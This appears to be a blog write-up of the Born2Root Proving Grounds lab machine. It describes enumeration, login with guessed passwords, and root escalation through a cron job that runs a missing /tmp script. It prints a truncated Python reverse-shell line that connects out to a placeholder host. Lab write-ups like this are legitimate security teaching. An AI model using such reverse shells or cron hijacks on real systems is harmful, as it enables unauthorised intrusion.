BORN2ROOT — Offensive Security

Offensive Security Proving Ground Complete Write-up

Exporting IP of the target machine as environment variable and scanned the target and found open ports and services as:

After switching up to port 80, three users found as martin, hadi, jimmy. COOL!!

After busting the directories with wfuzz, the results are

After hoping to icons directories and enumerating all the files , there’s was a file having ssh key

AWESOME!!, so we got three users, after trying with martin with password secret lab, it was a successful login

Enumerating the martin’s machine and found that in crontab,the file sekurity.py is running every five minutes which itself is missing in /tmp

So i created the same file name with reverse shell payload

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",0000));

with my knife listening on my root machine and yes, it was a good to go!

Enumerating the machine and found nothing special and only user left is hadi, so tried with hadi and with normal password of hadi123 and guess it worked!!!!

Enumerating the machine and after switching user with su command i tried with same password and was a successful login,

Clearly we are now root!!!

That’s all for now!!

Until Next Time,

Stay COOL!!!!

For any query, catch me on:

https://www.linkedin.com/in/user-neeleshpatel/

--

--

--

Cybersecurity | CTFs | Networking |

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

CIS Control v8 Overview- Control 12

Keeping Your Magento Store Safe

Screening Multiple Targets for Cybersecurity

HermeticWiper: What do we need to know about this new malware?

Configuring secure cipher suites in Windows Server 2019 IIS

BUIDL with NuCypher at ETHDenver 2021

Security Testing — SAST, DAST and IAST explained

{UPDATE} Fragment's Note Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Neelesh Patel

Neelesh Patel

Cybersecurity | CTFs | Networking |

More from Medium

Popcorn | HTB | OSCP | Box 16

Hack The Box — Lame

GAARA — Offensive Security PG Play

picoCTF write up: Nice netcat…